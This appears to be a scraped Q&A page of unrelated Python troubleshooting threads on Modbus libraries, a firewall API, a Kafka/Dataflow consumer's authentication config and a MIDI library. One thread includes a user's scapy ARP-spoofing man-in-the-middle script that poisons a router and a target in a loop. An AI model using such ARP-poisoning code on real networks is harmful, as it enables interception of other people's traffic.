I'm currently trying to develop an application that uses the Modbus-RTU protocol, and I have to use modbus_tk in Python 2.7.
I'm supposed to use bits of code from another application which is able to communicate with the micro-controller via modbus. It works on that app when I run the following code, but I get an error when I run the same lines in my app.
import modbus_tk
import modbus_tk.defines as cst
import modbus_tk.modbus_rtu as modbus_rtu
import serial
MB_Add_Status = 8 + 5001
def MB_GetStatus(MB_Master_handle):
try:
status = MB_Master_handle.execute(1, cst.READ_HOLDING_REGISTERS, MB_Add_Status, 1)
return status
except modbus_tk.modbus.ModbusError, e:
logger.error("%s- Code=%d" % (e, e.get_exception_code()))
MB_port = 3
masterMB = modbus_rtu.RtuMaster(serial.Serial(port='COM'+str(MB_port), baudrate=19200, bytesize=8, parity='N', stopbits=2, xonxoff=0))
status = MB_GetStatus(masterMB)
First I needed to delete the arguments baudrate, bytesize, etc. in the constructor call because it rose an error like :
TypeError: __init__() got an unexpected keyword argument 'stopbits'
But then when we get to the call to execute, there is an error again, which I couldn't solve yet :
modbus_tk.modbus.ModbusInvalidResponseError: Response length is invalid 0
The only documentation I found is: https://github.com/Nobatek/modbus-tk/tree/master/docs, but I couldn't quite understand much of it. If someone could first explain me what this error really means, and where I should look, this would be highly appreciated. Thank you very much !
The right repository for this library is https://github.com/ljean/modbus-tk
It requires PySerial 2.7
Found it !
I updated the library and set the parameters of the constructor correctly. This works fine know.
Related
I'm trying to understand how to read the following documentation:
https://pandevice.readthedocs.io/en/latest/readme.html
This is something I need to learn how to do, but I'm having difficulty doing simple tasks.. Some I can get to work correctly, some I just can't see how to get working.
For example. If I were to add an interface and IP address:
from panos import device, firewall, network
fw_ip = "1.2.3.4"
api_username = "admin"
api_password = "pass123!"
#connect to firewall
fw = firewall.Firewall(fw_ip, api_username=api_username, api_password=api_password)
#create interface
interface = network.EthernetInterface(name="ethernet1/5", mode="layer3", ip="192.168.0.1/24")
fw.add(interface)
interface.create()
That is straight forward. But I can't for the life of me figure out how to replace/remove/delete/change any elements in an interface. I KNOW this is a matter of me not understanding the documentation. Here's my attempt thus far:
interface = network.EthernetInterface(name='ethernet1/5')
fw.delete(interface)
interface.create()
but I get the following error:
TypeError: delete() takes 1 positional argument but 2 were given
The other methods the documentation point out are remove() and delete() but neither work.
I have a feeling this will be an easy one for someone who reads these often.
Thanks.
I´ve made a simple pipeline in Python to read from kafka, the thing is that the kafka cluster is on confluent cloud and I am having some trouble conecting to it.
Im getting the following log on the dataflow job:
Caused by: org.apache.kafka.common.KafkaException: Failed to construct kafka consumer
at org.apache.kafka.clients.consumer.KafkaConsumer.<init>(KafkaConsumer.java:820)
at org.apache.kafka.clients.consumer.KafkaConsumer.<init>(KafkaConsumer.java:631)
at org.apache.kafka.clients.consumer.KafkaConsumer.<init>(KafkaConsumer.java:612)
at org.apache.beam.sdk.io.kafka.KafkaIO$Read$GenerateKafkaSourceDescriptor.processElement(KafkaIO.java:1495)
Caused by: java.lang.IllegalArgumentException: Could not find a 'KafkaClient' entry in the JAAS configuration. System property 'java.security.auth.login.config' is not set
So I think Im missing something while passing the config since it mentions something related to it, Im really new to all of this and I know nothing about java so I dont know how to proceed even reading the JAAS documentation.
The code of the pipeline is the following:
import apache_beam as beam
from apache_beam.io.kafka import ReadFromKafka
from apache_beam.options.pipeline_options import PipelineOptions
import os
import json
import logging
os.environ['GOOGLE_APPLICATION_CREDENTIALS']='credentialsOld.json'
with open('cluster.configuration.json') as cluster:
data=json.load(cluster)
cluster.close()
def logger(element):
logging.INFO('Something was found')
def main():
config={
"bootstrap.servers":data["bootstrap.servers"],
"security.protocol":data["security.protocol"],
"sasl.mechanisms":data["sasl.mechanisms"],
"sasl.username":data["sasl.username"],
"sasl.password":data["sasl.password"],
"session.timeout.ms":data["session.timeout.ms"],
"auto.offset.reset":"earliest"
}
print('======================================================')
beam_options = PipelineOptions(runner='DataflowRunner',project='project',experiments=['use_runner_v2'],streaming=True,save_main_session=True,job_name='kafka-stream-test')
with beam.Pipeline(options=beam_options) as p:
msgs = p | 'ReadKafka' >> ReadFromKafka(consumer_config=config,topics=['users'],expansion_service="localhost:8088")
msgs | beam.FlatMap(logger)
if __name__ == '__main__':
main()
I read something about passing a property java.security.auth.login.config in the config dictionary but since that example is with java and I´am using python Im really lost at what I have to pass or even if that´s the property I have to pass etc.
btw Im getting the api key and secret from here and this is what I am passing to sasl.username and sasl.password
I faced the same error the first time I tried the beam's expansion service. The key sasl.mechanisms that you are supplying is incorrect, try with sasl.mechanism also you do not need to supply the username and password since you are connection is authenticated by jasl basically the consumer_config like below worked for me:
config={
"bootstrap.servers":data["bootstrap.servers"],
"security.protocol":data["security.protocol"],
"sasl.mechanism":data["sasl.mechanisms"],
"session.timeout.ms":data["session.timeout.ms"],
"group.id":"tto",
"sasl.jaas.config":f'org.apache.kafka.common.security.plain.PlainLoginModule required serviceName="Kafka" username=\"{data["sasl.username"]}\" password=\"{data["sasl.password"]}\";',
"auto.offset.reset":"earliest"
}
I got a partial answer to this question since I fixed this problem but got into another one:
config={
"bootstrap.servers":data["bootstrap.servers"],
"security.protocol":data["security.protocol"],
"sasl.mechanisms":data["sasl.mechanisms"],
"sasl.username":data["sasl.username"],
"sasl.password":data["sasl.password"],
"session.timeout.ms":data["session.timeout.ms"],
"group.id":"tto",
"sasl.jaas.config":f'org.apache.kafka.common.security.plain.PlainLoginModule required serviceName="Kafka" username=\"{data["sasl.username"]}\" password=\"{data["sasl.password"]}\";',
"auto.offset.reset":"earliest"
}
I needed to provide the sasl.jaas.config porpertie with the api key and secret of my cluster and also the service name, however, now Im facing a different error whe running the pipeline on dataflow:
Caused by: org.apache.kafka.common.errors.TimeoutException: Timeout expired while fetching topic metadata
This error shows after 4-5 mins of trying to run the job on dataflow, actually I have no idea how to fix this but I think is related to my broker on confluent rejecting the connection, I think this could be related to the zone execution since the cluster is in a different zone than job region.
UPDATE:
I tested the code on linux/ubuntu and I dont know why but the expansión service gets downloaded automatically so you wont get unsoported signal error, still having some issues trying to autenticate to confluent kafka tho.
I am using scapy for a simple MITM attack script (I am using it for educational perposes only of course), and I got this strange error which says : WARNING: No libpcap provider available ! pcap won't be used. I tryied looking this error up online but no one realy answered it. What does this error mean? Is it possible that I am just not using the script correctly? Any help vould be appreciated.
Here is my script:
import scapy.all as scapy
def get_target_mac(ip):
arp_request = scapy.ARP(pdst=ip)
broadcast = scapy.Ether(dst= 'ff:ff:ff:ff:ff:ff')
finalpacket = broadcast/arp_request
answer = scapy.srp(finalpacket, timeout=2, verbose=False)[0]
mac = answer[0][1].hwsrc
return(mac)
def restore(destination_ip, source_ip):
target_mac = get_target_mac(destination_ip)
source_mac = get_target_mac(source_ip)
packet = scapy.ARP(op=2, pdst=destination_ip, hwdst=target_mac, pscr=source_ip, hwsrc = source_mac)
scapy.sendp(packet, verbose=False)
def spoof_arp(target_ip, spoofed_ip):
mac = get_target_mac(target_ip)
packet = scapy.ARP(op = 2, hwdst = target_ip, psrc=spoofed_ip)
scapy.sendp(packet, verbose=False)
def main():
try:
while True:
spoof_arp('router_ip', 'fake_ip')#I hided the real ip
spoof_arp('fake_ip', 'router_ip')
except KeyboardInterrupt:
restore('router_ip', 'fake_ip')
restore('fake_ip', 'router_ip')
exit(0)
I think that user16139739 give a possible solution. I got some problems with scapy, this being one of them, the stable has some know bugs which were corrected in the development version.
I did not install anything else, in my case perhaps I already used user16139739 solution before, but still get this error in some point and another with RawPcapReader, so I used the development version.
libpcap is a library for Unix, you need an alternate (npcap) or windows compatible counterpart (WinPcap)
I was able to remedy the problem by installing Nmap (Network Packet Manipulation Library for windows 10).
My code:
import mido
import time
mido.set_backend('mido.backends.pygame')
output = mido.open_output()
output.send(mido.Message('note_on', note=64, velocity=60))
time.sleep(3)
output.close()
After the last line, the following error is printed:
Exception Exception: "PortMidi: `Bad pointer'" in <pypm.Output object at 0x025FF0B0> ignored
Apart from that, everything seems to work fine. However I'm developing a console app and this output is annoying. How can I get rid of this error?
I am using Windows 7 and Python 2.7.
You don't even have to set the RtMidi backend as it is the default, see mido backend documentation
I'm trying to read modbus registers from a PLC using pymodbus. I am following the example posted here. When I attempt print.registers I get the following error: object has no attribute 'registers'
The example doesn't show the modules being imported but seems to be the accepted answer. I think the error may be that I'm importing the wrong module or that I am missing a module. I am simply trying to read a register.
Here is my code:
from pymodbus.client.sync import ModbusTcpClient
c = ModbusTcpClient(host="192.168.1.20")
chk = c.read_holding_registers(257,10, unit = 1)
response = c.execute(chk)
print response.registers
From reading the pymodbus code, it appears that the read_holding_registers object's execute method will return either a response object or an ExceptionResponse object that contains an error. I would guess you're receiving the latter. You need to try something like this:
from pymodbus.register_read_message import ReadHoldingRegistersResponse
#...
response = c.execute(chk)
if isinstance(response, ReadHoldingRegistersResponse):
print response.registers
else:
pass # handle error condition here